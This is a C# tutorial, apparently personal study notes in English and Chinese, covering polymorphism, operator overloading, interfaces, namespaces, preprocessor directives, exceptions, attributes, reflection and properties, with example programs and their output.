​In C#, abstract classes and interfaces are two important mechanisms for achieving polymorphism, and they differ in several key ways:

1. Definition and purpose:
  • Abstract class: a class that can contain abstract methods (without implementations) and concrete methods (with implementations). It cannot be instantiated, only inherited. A subclass must implement (override) all of its abstract methods, unless the subclass is itself declared abstract. Abstract classes may contain fields, properties, constructors, and so on.
  • Interface: a reference type that defines the contract of methods and properties a class or struct must follow. An interface may only declare methods, properties, events and indexers, with no implementation. A class implements an interface to guarantee that it provides all of the interface's members.
2. Multiple inheritance:
  • Abstract class: C# does not support multiple inheritance; a class can inherit from only one abstract (or concrete) class. An abstract class may itself implement several interfaces.
  • Interface: supports multiple inheritance; one class can implement several interfaces, which makes interfaces more flexible for specifying behavior.
3. Member implementation:
  • Abstract class: may contain method implementations, which subclasses can selectively override.
  • Interface: contains no method implementations, only signatures.
4. Fields and constants:
  • Abstract class: may contain fields (private, protected, and so on) as well as constant fields.
  • Interface: cannot contain fields, only constants.
5. Design intent:
  • Abstract class: usually expresses an "is-a" relationship, a fundamental type or concept whose functionality subclasses are expected to extend.
  • Interface: usually expresses a "can-do" capability, a set of behaviors; a class implements the interface to declare that it has those capabilities.
    using System;
    namespace PolymorphismApplication
    {
    abstract class Shape
    {
    abstract public int area(); // 标记为 abstract 的函数只可声明,不可定义实现
    }

    class Rectangle : Shape
    {
    private int length;
    private int width;
    public Rectangle(int a = 0, int b = 0)
    {
    length = a;
    width = b;
    }
    public override int area() // 若要实现继承所定义的函数,使用 override 标记
    {
    Console.WriteLine("Rectangle 类的面积:");
    return (width * length);
    }
    }

    class RectangleTester
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle(10, 7);
    double a = r.area();
    Console.WriteLine("面积: {0}", a);
    Console.ReadKey();
    }
    }
    }
    Rectangle 类的面积:
    面积: 70

​When a function defined in a class needs to be implemented in inheriting classes, you can use a virtual method (unlike abstract, virtual lets the base class provide an implementation).

• Virtual methods are declared with the keyword virtual.

• A virtual method can have different implementations in different inheriting classes.

• Calls to virtual methods are resolved at run time.

• Dynamic polymorphism is achieved through abstract classes and virtual methods.

​The following example creates a base class Shape and derived classes Circle, Rectangle and Triangle. Shape provides a virtual method named Draw, which each derived class overrides to draw its own shape.

    using System;
    using System.Collections.Generic;

    public abstract class Shape
    {
    public int X { get; private set; }
    public int Y { get; private set; }
    public int Height { get; set; }
    public int Width { get; set; }

    // 虚方法
    public virtual void Draw()
    {
    Console.WriteLine("执行基类的画图任务");
    }
    }

    class Circle : Shape
    {
    public override void Draw() // 同样使用 override
    {
    Console.WriteLine("画一个圆形");
    base.Draw();
    }
    }
    class Rectangle : Shape
    {
    public override void Draw()
    {
    Console.WriteLine("画一个长方形");
    base.Draw();
    }
    }
    class Triangle : Shape
    {
    public override void Draw()
    {
    Console.WriteLine("画一个三角形");
    base.Draw();
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    // 创建一个 List<Shape> 对象,并向该对象添加 Circle、Triangle 和 Rectangle
    var shapes = new List<Shape>
    {
    new Rectangle(),
    new Triangle(),
    new Circle()
    };

    // 使用 foreach 循环对该列表的派生类进行循环访问,并对其中的每个 Shape 对象调用 Draw 方法
    foreach (var shape in shapes)
    {
    shape.Draw();
    }

    Console.WriteLine("按下任意键退出。");
    Console.ReadKey();
    }

    }
    画一个长方形
    执行基类的画图任务
    画一个三角形
    执行基类的画图任务
    画一个圆形
    执行基类的画图任务
    按下任意键退出。

​The following program uses the virtual method area() to compute the areas of different shapes (the same statement executes different code underneath):

    using System;
    namespace PolymorphismApplication
    {
    class Shape
    {
    protected int width, height;
    public Shape( int a=0, int b=0)
    {
    width = a;
    height = b;
    }
    public virtual int area()
    {
    Console.WriteLine("父类的面积:");
    return 0;
    }
    }
    class Rectangle: Shape
    {
    public Rectangle( int a=0, int b=0): base(a, b)
    {

    }
    public override int area ()
    {
    Console.WriteLine("Rectangle 类的面积:");
    return (width * height);
    }
    }
    class Triangle: Shape
    {
    public Triangle(int a = 0, int b = 0): base(a, b)
    {

    }
    public override int area()
    {
    Console.WriteLine("Triangle 类的面积:");
    return (width * height / 2);
    }
    }
    class Caller
    {
    public void CallArea(Shape sh)
    {
    int a;
    a = sh.area();
    Console.WriteLine("面积: {0}", a);
    }
    }
    class Tester
    {

    static void Main(string[] args)
    {
    Caller c = new Caller();
    Rectangle r = new Rectangle(10, 7);
    Triangle t = new Triangle(10, 5);
    c.CallArea(r);
    c.CallArea(t);
    Console.ReadKey();
    }
    }
    }
    Rectangle 类的面积:
    面积: 70
    Triangle 类的面积:
    面积: 25

C# Operator Overloading

You can redefine or overload the operators built into C#, so that operators work on user-defined types as well. An overloaded operator is a function with a special name, defined with the keyword operator followed by the operator's symbol. Like any other function, an overloaded operator has a return type and a parameter list.

Implementing Operator Overloading

    using System;

    namespace OperatorOvlApplication
    {
    class Box
    {
    private double length; // 长度
    private double breadth; // 宽度
    private double height; // 高度

    public double getVolume()
    {
    return length * breadth * height;
    }
    public void setLength( double len )
    {
    length = len;
    }

    public void setBreadth( double bre )
    {
    breadth = bre;
    }

    public void setHeight( double hei )
    {
    height = hei;
    }
    // 重载 + 运算符来把两个 Box 对象相加
    public static Box operator+ (Box b, Box c)
    {
    Box box = new Box();
    box.length = b.length + c.length;
    box.breadth = b.breadth + c.breadth;
    box.height = b.height + c.height;
    return box;
    }

    }

    class Tester
    {
    static void Main(string[] args)
    {
    Box Box1 = new Box(); // 声明 Box1,类型为 Box
    Box Box2 = new Box(); // 声明 Box2,类型为 Box
    Box Box3 = new Box(); // 声明 Box3,类型为 Box
    double volume = 0.0; // 体积

    // Box1 详述
    Box1.setLength(6.0);
    Box1.setBreadth(7.0);
    Box1.setHeight(5.0);

    // Box2 详述
    Box2.setLength(12.0);
    Box2.setBreadth(13.0);
    Box2.setHeight(10.0);

    // Box1 的体积
    volume = Box1.getVolume();
    Console.WriteLine("Box1 的体积: {0}", volume);

    // Box2 的体积
    volume = Box2.getVolume();
    Console.WriteLine("Box2 的体积: {0}", volume);

    // 把两个对象相加
    Box3 = Box1 + Box2;

    // Box3 的体积
    volume = Box3.getVolume();
    Console.WriteLine("Box3 的体积: {0}", volume);
    Console.ReadKey();
    }
    }
    }
    Box1 的体积: 210
    Box2 的体积: 1560
    Box3 的体积: 5400

    可重载和不可重载运算符

    • +, -, !, ~, ++, --:这些一元运算符只有一个操作数,且可以被重载。
    • +, -, *, /, %:这些二元运算符带有两个操作数,且可以被重载。
    • ==, !=, <, >, <=, >=:这些比较运算符可以被重载(必须成对重载,见下方示例)。
    • &&, ||:这些条件逻辑运算符不能被直接重载。
    • +=, -=, *=, /=, %=:这些赋值运算符不能被重载。
    • =, ., ?:, ->, new, is, sizeof, typeof:这些运算符不能被重载。
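
    ​补充一个小示例(非教程原文;其中的 Money 类型是为演示而假设的):在 C# 中,== 与 != 这样的比较运算符必须成对重载,否则无法通过编译;同时通常建议一并重写 Equals 和 GetHashCode,保持语义一致:

    using System;

    public struct Money
    {
        public decimal Amount; // 金额

        public Money(decimal amount) { Amount = amount; }

        // == 与 != 必须成对重载,缺一个会报编译错误 CS0216
        public static bool operator ==(Money a, Money b) => a.Amount == b.Amount;
        public static bool operator !=(Money a, Money b) => a.Amount != b.Amount;

        // 与 == 保持一致的 Equals / GetHashCode
        public override bool Equals(object obj) => obj is Money m && m.Amount == Amount;
        public override int GetHashCode() => Amount.GetHashCode();
    }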

    C# 接口(Interface)

    • 接口定义了所有类继承接口时应遵循的语法合同。接口定义了语法合同 “是什么” 部分,派生类定义了语法合同 “怎么做” 部分。

    • 接口定义了属性、方法和事件,这些都是接口的成员。接口只包含了成员的声明,成员的定义是派生类的责任。接口提供了派生类应遵循的标准结构。

    • 接口使得实现接口的类或结构在形式上保持一致。

    • 抽象类在某种程度上与接口类似,但是,它们大多只用在只有少数方法由基类声明、而由派生类实现的场合。

    • 接口本身并不实现任何功能,它只是和声明实现该接口的对象订立一个必须实现哪些行为的契约。

    • 抽象类不能直接实例化,但允许派生出具体的,具有实际功能的类。


    ​接口使用 interface 关键字声明,它与类的声明类似。接口声明默认是 public 的。下面是一个接口声明的实例:

    ​下面的代码定义了接口 IMyInterface。通常接口命名以 I 字母开头,这个接口只有一个方法 MethodToImplement(),没有参数和返回值,当然我们可以按照需求设置参数和返回值。

    ​值得注意的是,该方法并没有具体的实现。

    using System;

    interface IMyInterface
    {
    // 接口成员
    void MethodToImplement();
    }

    class InterfaceImplementer : IMyInterface
    {
    static void Main()
    {
    InterfaceImplementer iImp = new InterfaceImplementer();
    iImp.MethodToImplement();
    }

    public void MethodToImplement()
    {
    Console.WriteLine("MethodToImplement() called.");
    }
    }
    MethodToImplement() called.

    ​以下实例定义了两个接口 IMyInterface 和 IParentInterface。

    ​(接口可以继承其他接口)如果一个接口继承其他接口,那么实现类或结构就需要实现所有接口的成员。

    ​以下实例中 IMyInterface 继承了 IParentInterface 接口,因此接口实现类必须实现 MethodToImplement() 和 ParentInterfaceMethod() 方法:

    using System;

    interface IParentInterface
    {
    void ParentInterfaceMethod();
    }

    interface IMyInterface : IParentInterface
    {
    void MethodToImplement();
    }

    class InterfaceImplementer : IMyInterface
    {
    static void Main()
    {
    InterfaceImplementer iImp = new InterfaceImplementer();
    iImp.MethodToImplement();
    iImp.ParentInterfaceMethod();
    }

    public void MethodToImplement()
    {
    Console.WriteLine("MethodToImplement() called.");
    }

    public void ParentInterfaceMethod()
    {
    Console.WriteLine("ParentInterfaceMethod() called.");
    }
    }
    MethodToImplement() called.
    ParentInterfaceMethod() called.

    C# 命名空间(Namespace)

    命名空间的设计目的是提供一种让一组名称与其他名称分隔开的方式。在一个命名空间中声明的类的名称,不会与另一个命名空间中声明的相同的类的名称冲突。

    ​我们举一个计算机系统中的例子,一个文件夹(目录)中可以包含多个文件夹,每个文件夹中不能有相同的文件名,但不同文件夹中的文件可以重名。

    定义命名空间
    using System;

    namespace first_space
    {
    class namespace_cl
    {
    public void func()
    {
    Console.WriteLine("Inside first_space");
    }
    }
    }
    namespace second_space
    {
    class namespace_cl
    {
    public void func()
    {
    Console.WriteLine("Inside second_space");
    }
    }
    }
    class TestClass
    {
    static void Main(string[] args)
    {
    first_space.namespace_cl fc = new first_space.namespace_cl();
    second_space.namespace_cl sc = new second_space.namespace_cl();
    fc.func();
    sc.func();
    Console.ReadKey();
    }
    }
    Inside first_space
    Inside second_space
    using 关键字

    using 关键字表明程序使用的是给定命名空间中的名称。例如,我们在程序中使用 System 命名空间,其中定义了类 Console。我们可以只写:

    Console.WriteLine ("Hello there");

    ​我们可以写完全限定名称,如下:

    System.Console.WriteLine("Hello there");

    ​您也可以使用 using 命名空间指令,这样在使用的时候就不用在前面加上命名空间名称。(类似于 C++ 里的 using namespace std;

    using System;
    using first_space;
    using second_space;

    namespace first_space
    {
    class abc
    {
    public void func()
    {
    Console.WriteLine("Inside first_space");
    }
    }
    }
    namespace second_space
    {
    class efg
    {
    public void func()
    {
    Console.WriteLine("Inside second_space");
    }
    }
    }
    class TestClass
    {
    static void Main(string[] args)
    {
    abc fc = new abc();
    efg sc = new efg();
    fc.func();
    sc.func();
    Console.ReadKey();
    }
    }
    Inside first_space
    Inside second_space
    嵌套命名空间

    ​命名空间可以被嵌套,即您可以在一个命名空间内定义另一个命名空间,如下所示:

    using System;
    using SomeNameSpace;
    using SomeNameSpace.Nested;

    namespace SomeNameSpace
    {
    public class MyClass
    {
    static void Main()
    {
    Console.WriteLine("In SomeNameSpace");
    Nested.NestedNameSpaceClass.SayHello();
    }
    }

    // 内嵌命名空间
    namespace Nested
    {
    public class NestedNameSpaceClass
    {
    public static void SayHello()
    {
    Console.WriteLine("In Nested");
    }
    }
    }
    }

    C# 预处理器指令

    预处理器指令(Preprocessor Directives)指导编译器在实际编译开始之前对信息进行预处理

    ​通过这些指令,可以控制编译器如何编译文件或编译哪些部分。常见的预处理器指令包括条件编译、宏定义等。

    ​所有的预处理器指令都是以 # 开始,且在一行上,只有空白字符可以出现在预处理器指令之前。

    ​预处理器指令不是语句,所以它们不以分号 ; 结束。

    ​C# 编译器没有一个单独的预处理器,但是,指令被处理时就像是有一个单独的预处理器一样。在 C# 中,预处理器指令用于在条件编译中起作用。与 C 和 C++ 不同的是,它们不是用来创建宏。一个预处理器指令必须是该行上的唯一指令。

    C# 预处理器指令列表

    ​下表列出了 C# 中可用的预处理器指令:

    • #define:定义一个符号,可以用于条件编译。
    • #undef:取消定义一个符号。
    • #if:开始一个条件编译块,如果符号被定义则包含代码块。
    • #elif:如果前面的 #if 或 #elif 条件不满足,且当前条件满足,则包含代码块。
    • #else:如果前面的 #if 或 #elif 条件不满足,则包含代码块。
    • #endif:结束一个条件编译块。
    • #warning:生成编译器警告信息。
    • #error:生成编译器错误信息。
    • #region:标记一段代码区域,可以在 IDE 中折叠和展开这段代码,便于代码的组织和阅读。
    • #endregion:结束一个代码区域。
    • #line:更改编译器输出中的行号和文件名,可以用于调试或生成工具的代码。
    • #pragma:用于给编译器发送特殊指令,例如禁用或恢复特定的警告。
    • #nullable:控制可空性上下文和注释,允许启用或禁用对可空引用类型的编译器检查。

    #define 和 #undef 预处理器

    #define 用于定义符号(通常用于条件编译),#undef 用于取消定义符号。

    #define DEBUG

    #undef RELEASE

    ​#define 允许您定义一个符号,这样,通过使用符号作为传递给 #if 指令的表达式,表达式将返回 true。它的语法如下:

    #define PI 
    using System;
    namespace PreprocessorDAppl
    {
    class Program
    {
    static void Main(string[] args)
    {
    #if (PI)
    Console.WriteLine("PI is defined");
    #else
    Console.WriteLine("PI is not defined");
    #endif
    Console.ReadKey();
    }
    }
    }
    PI is defined

    条件指令:#if, #elif, #else 和 #endif

    ​您可以使用 #if 指令来创建一个条件指令。

    ​条件指令用于测试符号是否为真。如果为真,编译器会执行 #if 和下一个指令之间的代码。

    ​条件指令的语法:

    #define DEBUG
    #define VC_V10
    using System;
    public class TestClass
    {
    public static void Main()
    {

    #if (DEBUG && !VC_V10)
    Console.WriteLine("DEBUG is defined");
    #elif (!DEBUG && VC_V10)
    Console.WriteLine("VC_V10 is defined");
    #elif (DEBUG && VC_V10)
    Console.WriteLine("DEBUG and VC_V10 are defined");
    #else
    Console.WriteLine("DEBUG and VC_V10 are not defined");
    #endif
    Console.ReadKey();
    }
    }
    DEBUG and VC_V10 are defined

    #pragma

    ​用于向编译器发送特殊指令。最常见的用法是禁用特定的警告。

    #pragma warning disable 414
    private int unusedVariable;
    #pragma warning restore 414

    使用预处理器指令的注意事项

    • 提高代码可读性:使用 #region 可以帮助分隔代码块,提高代码的组织性。
    • 条件编译:通过 #if 等指令可以在开发和生产环境中编译不同的代码,方便调试和发布。
    • 警告和错误:通过 #warning 和 #error 可以在编译时提示开发人员注意特定问题。

    ​通过正确使用这些预处理器指令,可以更好地控制代码的编译过程,提高代码的灵活性和可维护性。
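
    ​下面给出一个把 #region、#warning 与条件编译结合起来的最小示意(补充示例,非教程原文;符号 LEGACY_API 为假设):

    #define LEGACY_API
    using System;

    class PreprocessorDemo
    {
        #region 旧版 API(可在 IDE 中折叠)
    #if LEGACY_API
    #warning LEGACY_API 已定义,正在编译旧版代码路径
        static void OldMethod() => Console.WriteLine("old api");
    #endif
        #endregion

        static void Main()
        {
    #if LEGACY_API
            OldMethod();
    #endif
        }
    }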

    C# 正则表达式

    ​其实我觉得可以用 ChatGPT 帮自己写正则表达式。

    using System;
    using System.Text.RegularExpressions;

    public class Example
    {
    public static void Main()
    {
    string input = "1851 1999 1950 1905 2003";
    string pattern = @"(?<=19)\d{2}\b";

    foreach (Match match in Regex.Matches(input, pattern))
    Console.WriteLine(match.Value);
    }
    }
    99
    50
    05
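
    ​这里模式 (?<=19)\d{2}\b 用的是零宽度后行断言:只匹配紧跟在 19 之后的两位数字,且其后是单词边界,所以 1851 和 2003 不会被匹配。再补一个 Regex.Replace 的小示意(补充示例,非教程原文):

    using System;
    using System.Text.RegularExpressions;

    public class ReplaceExample
    {
        public static void Main()
        {
            // 把多个连续空白字符压缩为单个空格
            string text = "Hello   C#     Regex";
            Console.WriteLine(Regex.Replace(text, @"\s+", " "));
            // 输出:Hello C# Regex
        }
    }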

    C# 异常处理

    ​异常是在程序执行期间出现的问题。C# 中的异常是对程序运行时出现的特殊情况的一种响应,比如尝试除以零。

    ​异常提供了一种把程序控制权从某个部分转移到另一个部分的方式。C# 异常处理是建立在四个关键词之上的:try、catch、finally 和 throw。

    • try:一个 try 块标识了一个将被激活的特定的异常的代码块。后跟一个或多个 catch 块。
    • catch:程序通过异常处理程序捕获异常。catch 关键字表示异常的捕获。
    • finally:finally 块用于执行给定的语句,不管异常是否被抛出都会执行。例如,如果您打开一个文件,不管是否出现异常文件都要被关闭。
    • throw:当问题出现时,程序抛出一个异常。使用 throw 关键字来完成。

    C# 中的异常类

    ​C# 异常是使用类来表示的。C# 中的异常类主要是直接或间接地派生于 System.Exception 类。System.ApplicationException 和 System.SystemException 类是派生于 System.Exception 类的异常类。

    • System.ApplicationException 类支持由应用程序生成的异常。所以程序员定义的异常都应派生自该类。

    • System.SystemException 类是所有预定义的系统异常的基类。

    ​下表列出了一些派生自 System.SystemException 类的预定义的异常类:

    • System.IO.IOException:处理 I/O 错误。
    • System.IndexOutOfRangeException:处理当方法指向超出范围的数组索引时生成的错误。
    • System.ArrayTypeMismatchException:处理当数组类型不匹配时生成的错误。
    • System.NullReferenceException:处理当引用一个空对象(解引用 null)时生成的错误。
    • System.DivideByZeroException:处理当除以零时生成的错误。
    • System.InvalidCastException:处理在类型转换期间生成的错误。
    • System.OutOfMemoryException:处理空闲内存不足生成的错误。
    • System.StackOverflowException:处理栈溢出生成的错误。

    异常处理

    ​C# 以 try 和 catch 块的形式提供了一种结构化的异常处理方案。使用这些块,把核心程序语句与错误处理语句分离开。

    ​这些错误处理块是使用 try、catch(若发生异常,执行)和 finally(无论是否有异常,均执行)关键字实现的。下面是一个当除以零时抛出异常的实例:

    using System;
    namespace ErrorHandlingApplication
    {
    class DivNumbers
    {
    int result;
    DivNumbers()
    {
    result = 0;
    }
    public void division(int num1, int num2)
    {
    try
    {
    result = num1 / num2;
    }
    catch (DivideByZeroException e)
    {
    Console.WriteLine("Exception caught: {0}", e);
    }
    finally
    {
    Console.WriteLine("Result: {0}", result);
    }

    }
    static void Main(string[] args)
    {
    DivNumbers d = new DivNumbers();
    d.division(25, 0);
    d.division(25, 5);
    Console.ReadKey();
    }
    }
    }
    Exception caught: System.DivideByZeroException: 尝试除以零。
    在 ErrorHandlingApplication.DivNumbers.division(Int32 num1, Int32 num2) 位置 XXX.cs:行号 15
    Result: 0
    Result: 5
    创建用户自定义异常

    ​您也可以定义自己的异常。用户自定义的异常类是派生自 ApplicationException 类。使用 throw 来抛出异常。下面的实例演示了这点:

    using System;
    namespace UserDefinedException
    {
    class TestTemperature
    {
    static void Main(string[] args)
    {
    Temperature temp = new Temperature();
    try
    {
    temp.showTemp();
    }
    catch (TempIsZeroException e)
    {
    Console.WriteLine("TempIsZeroException: {0}", e.Message);
    }
    Console.ReadKey();
    }
    }
    }
    public class TempIsZeroException : ApplicationException
    {
    public TempIsZeroException(string message) : base(message)
    {
    }
    }
    public class Temperature
    {
    int temperature = 0;
    public void showTemp()
    {
    if (temperature == 0)
    {
    throw (new TempIsZeroException("Zero Temperature found"));
    }
    else
    {
    Console.WriteLine("Temperature: {0}", temperature);
    }
    }
    }
    TempIsZeroException: Zero Temperature found
    抛出对象

    ​如果异常是直接或间接派生自 System.Exception 类,您可以抛出一个对象。您可以在 catch 块中使用 throw 语句来抛出当前的对象,如下所示:

    catch (Exception e)
    {
    ...
    throw e;
    }
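
    ​顺带一提(原文未展开):throw e; 会重置异常的堆栈跟踪;若只是想原样重新抛出,惯用写法是单独的 throw;:

    try
    {
        // 可能抛出异常的代码
    }
    catch (Exception)
    {
        // 记录日志等处理……
        throw; // 保留原始堆栈跟踪地重新抛出
    }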

    C# 文件的输入与输出

    ​一个 文件 是一个存储在磁盘中带有指定名称和目录路径的数据集合。当打开文件进行读写时,它变成一个 流(stream)。

    ​从根本上说,流是通过通信路径传递的字节序列。有两个主要的流:输入流和输出流。输入流用于从文件读取数据(读操作),输出流用于向文件写入数据(写操作)。

    FileStream 类

    System.IO 命名空间中的 FileStream 类有助于文件的读写与关闭。该类派生自抽象类 Stream。

    ​您需要创建一个 FileStream 对象来创建一个新的文件,或打开一个已有的文件。


    ​具体地问 ChatGPT 吧……
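
    ​不过这里还是补一个最小的读写示意(补充示例,非教程原文;文件名 test.dat 为随意取的演示名):

    using System;
    using System.IO;

    class FileStreamDemo
    {
        static void Main()
        {
            // 打开(不存在则创建)文件,写入若干字节
            using (FileStream fs = new FileStream("test.dat", FileMode.OpenOrCreate, FileAccess.ReadWrite))
            {
                for (byte b = 0; b < 5; b++)
                {
                    fs.WriteByte(b);
                }

                // 回到文件开头,再逐字节读出
                fs.Seek(0, SeekOrigin.Begin);
                int data;
                while ((data = fs.ReadByte()) != -1)
                {
                    Console.Write(data + " "); // 输出:0 1 2 3 4
                }
            }
        }
    }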

    高级语法

    C# 特性

    ​Unity 里比较常用。

    ​特性(Attribute)是用于在运行时传递程序中各种元素(比如类、方法、结构、枚举、组件等)的行为信息的声明性标签。您可以通过使用特性向程序添加声明性信息。一个声明性标签是通过放置在它所应用的元素前面的方括号([ ])来描述的。

    ​特性(Attribute)用于添加元数据,如编译器指令和注释、描述、方法、类等其他信息。.Net 框架提供了两种类型的特性:预定义特性和自定义特性。

    预定义特性(Attribute)

    ​.Net 框架提供了三种预定义特性:

    • AttributeUsage

      • 预定义特性 AttributeUsage 描述了如何使用一个自定义特性类。它规定了特性可应用到的项目的类型。
    • Conditional

      • 这个预定义特性标记了一个条件方法,其执行依赖于指定的预处理标识符。

        它会引起方法调用的条件编译,取决于指定的值,比如 Debug 或 Trace。例如,当调试代码时显示变量的值。

    • Obsolete

      • 这个预定义特性标记了不应被使用的程序实体。它可以让您通知编译器丢弃某个特定的目标元素。例如,当一个新方法被用在一个类中,但是您仍然想要保持类中的旧方法,您可以通过显示一个应该使用新方法,而不是旧方法的消息,来把它标记为 obsolete(过时的)。
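
    ​在进入自定义特性之前,先用一个小例子感受 Conditional 与 Obsolete(补充示例,非教程原文;Conditional 位于 System.Diagnostics 命名空间,且只能标注返回 void 的方法):

    #define DEBUG
    using System;
    using System.Diagnostics;

    class AttributeDemo
    {
        [Conditional("DEBUG")] // 只有定义了 DEBUG 符号时,对它的调用才会被编译进去
        static void Log(string msg) => Console.WriteLine("LOG: " + msg);

        [Obsolete("请改用 NewMethod()")] // 调用处会产生编译器警告
        static void OldMethod() => Console.WriteLine("old");

        static void NewMethod() => Console.WriteLine("new");

        static void Main()
        {
            Log("调试信息"); // DEBUG 已定义,会输出
            OldMethod();     // 仍可运行,但编译时给出过时警告
            NewMethod();
        }
    }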

    创建自定义特性(Attribute)

    ​一个新的自定义特性应派生自 System.Attribute 类。

    // 一个自定义特性 BugFix 被赋给类及其成员
    using System;

    [AttributeUsage(AttributeTargets.Class |
    AttributeTargets.Constructor |
    AttributeTargets.Field |
    AttributeTargets.Method |
    AttributeTargets.Property,
    AllowMultiple = true)]

    public class DeBugInfo : System.Attribute
    {
    private int bugNo;
    private string developer;
    private string lastReview;
    public string message;

    public DeBugInfo(int bg, string dev, string d)
    {
    this.bugNo = bg;
    this.developer = dev;
    this.lastReview = d;
    }

    public int BugNo
    {
    get
    {
    return bugNo;
    }
    }
    public string Developer
    {
    get
    {
    return developer;
    }
    }
    public string LastReview
    {
    get
    {
    return lastReview;
    }
    }
    public string Message
    {
    get
    {
    return message;
    }
    set
    {
    message = value;
    }
    }
    }

    [DeBugInfo(45, "Zara Ali", "12/8/2012", Message = "Return type mismatch")]
    [DeBugInfo(49, "Nuha Ali", "10/10/2012", Message = "Unused variable")]
    class Rectangle
    {
    // 成员变量
    protected double length;
    protected double width;
    public Rectangle(double l, double w)
    {
    length = l;
    width = w;
    }
    [DeBugInfo(55, "Zara Ali", "19/10/2012",
    Message = "Return type mismatch")]
    public double GetArea()
    {
    return length * width;
    }
    [DeBugInfo(56, "Zara Ali", "19/10/2012")]
    public void Display()
    {
    Console.WriteLine("Length: {0}", length);
    Console.WriteLine("Width: {0}", width);
    Console.WriteLine("Area: {0}", GetArea());
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle(5, 8);
    r.Display();
    }
    }
    Length: 5
    Width: 8
    Area: 40

    C# 反射(Reflection)

    ​反射指程序可以访问、检测和修改它本身状态或行为的一种能力。

    ​程序集包含模块,而模块包含类型,类型又包含成员。反射则提供了封装程序集、模块和类型的对象。

    ​您可以使用反射动态地创建类型的实例,将类型绑定到现有对象,或从现有对象中获取类型。然后,可以调用类型的方法或访问其字段和属性。

    优缺点

    优点:

    • 1、反射提高了程序的灵活性和扩展性。
    • 2、降低耦合性,提高自适应能力。
    • 3、它允许程序创建和控制任何类的对象,无需提前硬编码目标类。

    缺点:

    • 1、性能问题:使用反射基本上是一种解释操作,在字段和方法访问上要远慢于直接代码。因此反射机制主要应用在对灵活性和拓展性要求很高的系统框架上,普通程序不建议使用。
    • 2、使用反射会模糊程序内部逻辑;程序员希望在源代码中看到程序的逻辑,反射却绕过了源代码的技术,因而会带来维护的问题,反射代码比相应的直接代码更复杂。

    反射(Reflection)的用途

    ​反射(Reflection)有下列用途:

    • 它允许在运行时查看特性(attribute)信息。
    • 它允许审查程序集中的各种类型,以及实例化这些类型。
    • 它允许延迟绑定的方法和属性(property)。
    • 它允许在运行时创建新类型,然后使用这些类型执行一些任务。
    using System;

    [AttributeUsage(AttributeTargets.All)]
    public class HelpAttribute : System.Attribute
    {
    public readonly string Url;

    public string Topic // Topic 是一个命名(named)参数
    {
    get
    {
    return topic;
    }
    set
    {

    topic = value;
    }
    }

    public HelpAttribute(string url) // url 是一个定位(positional)参数
    {
    this.Url = url;
    }

    public override string ToString()
    {
    return base.ToString() + ": "+ this.Url;
    }

    private string topic;
    }
    [HelpAttribute("Information on the class MyClass")]
    class MyClass
    {
    }

    namespace AttributeAppl
    {
    class Program
    {
    static void Main(string[] args)
    {
    System.Reflection.MemberInfo info = typeof(MyClass);
    object[] attributes = info.GetCustomAttributes(true);
    for (int i = 0; i < attributes.Length; i++)
    {
    System.Console.WriteLine(attributes[i]);
    }
    Console.ReadKey();

    }
    }
    }
    HelpAttribute: Information on the class MyClass
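
    ​上面的例子演示了读取特性;再补一个用反射在运行时创建实例并调用方法的小示意(补充示例,非教程原文,Greeter 等名称为假设):

    using System;
    using System.Reflection;

    public class Greeter
    {
        public string Hello(string name) => "Hello, " + name;
    }

    class ReflectionDemo
    {
        static void Main()
        {
            Type t = typeof(Greeter);

            // 运行时创建实例(效果等同于 new Greeter())
            object obj = Activator.CreateInstance(t);

            // 运行时查找并调用方法
            MethodInfo mi = t.GetMethod("Hello");
            object result = mi.Invoke(obj, new object[] { "World" });

            Console.WriteLine(result); // Hello, World
        }
    }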

    C# 属性(Property)

    属性(Property) 是类(class)、结构(structure)和接口(interface)的命名(named)成员。类或结构中的成员变量或方法称为 域(Field)。属性(Property)是域(Field)的扩展,且可使用相同的语法来访问。它们使用 访问器(accessors) 让私有域的值可被读写或操作。

    ​属性(Property)不会确定存储位置。相反,它们具有可读写或计算它们值的 访问器(accessors)

    ​例如,有一个名为 Student 的类,带有 age、name 和 code 的私有域。我们不能在类的范围以外直接访问这些域,但是我们可以拥有访问这些私有域的属性

    访问器(Accessors)

    ​属性(Property)的访问器(accessor)包含有助于获取(读取或计算)或设置(写入)属性的可执行语句。访问器(accessor)声明可包含一个 get 访问器、一个 set 访问器,或者同时包含二者。例如:

    using System;
    namespace runoob
    {
    class Student
    {

    private string code = "N.A";
    private string name = "not known";
    private int age = 0;

    // 声明类型为 string 的 Code 属性
    public string Code
    {
    get
    {
    return code;
    }
    set
    {
    code = value;
    }
    }

    // 声明类型为 string 的 Name 属性
    public string Name
    {
    get
    {
    return name;
    }
    set
    {
    name = value;
    }
    }

    // 声明类型为 int 的 Age 属性
    public int Age
    {
    get
    {
    return age;
    }
    set
    {
    age = value;
    }
    }
    public override string ToString()
    {
    return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
    }
    }
    class ExampleDemo
    {
    public static void Main()
    {
    // 创建一个新的 Student 对象
    Student s = new Student();

    // 设置 student 的 code、name 和 age
    s.Code = "001";
    s.Name = "Zara";
    s.Age = 9;
    Console.WriteLine("Student Info: {0}", s);
    // 增加年龄
    s.Age += 1;
    Console.WriteLine("Student Info: {0}", s);
    Console.ReadKey();
    }
    }
    }
    Student Info: Code = 001, Name = Zara, Age = 9
    Student Info: Code = 001, Name = Zara, Age = 10

    ​在这段代码中,将 code、name 和 age 设为私有字段,并通过公共属性 Code、Name 和 Age 进行访问的做法,比直接将它们设为公共字段(public fields)有几个优势:

    1. 封装性和安全性: 使用属性可以提供更好的封装性,隐藏了实现细节(私有字段 code、name、age),并且可以在属性的 getter 和 setter 方法中添加额外的逻辑。例如,可以在 setter 中验证输入值的有效性或执行特定的逻辑(见下方示例)。
    2. 易于修改和扩展: 如果将字段直接暴露为公共字段,在修改字段名称、类型或者添加验证逻辑时,会影响到所有访问该字段的代码。而使用属性,可以在不影响其他代码的情况下修改属性的实现。
    3. 数据绑定和事件处理: 使用属性使得数据绑定更加容易。一些 GUI 应用程序框架(如 WPF、WinForms)能够自动绑定属性到用户界面元素,这样可以通过属性实现数据的显示和输入验证。此外,属性的 setter 可以触发事件,通知其他对象数据的变化。
    4. 符合面向对象的设计原则: 封装是面向对象编程的核心原则之一,它提供了更好的抽象和封装,使得代码更加模块化、可维护和可测试。

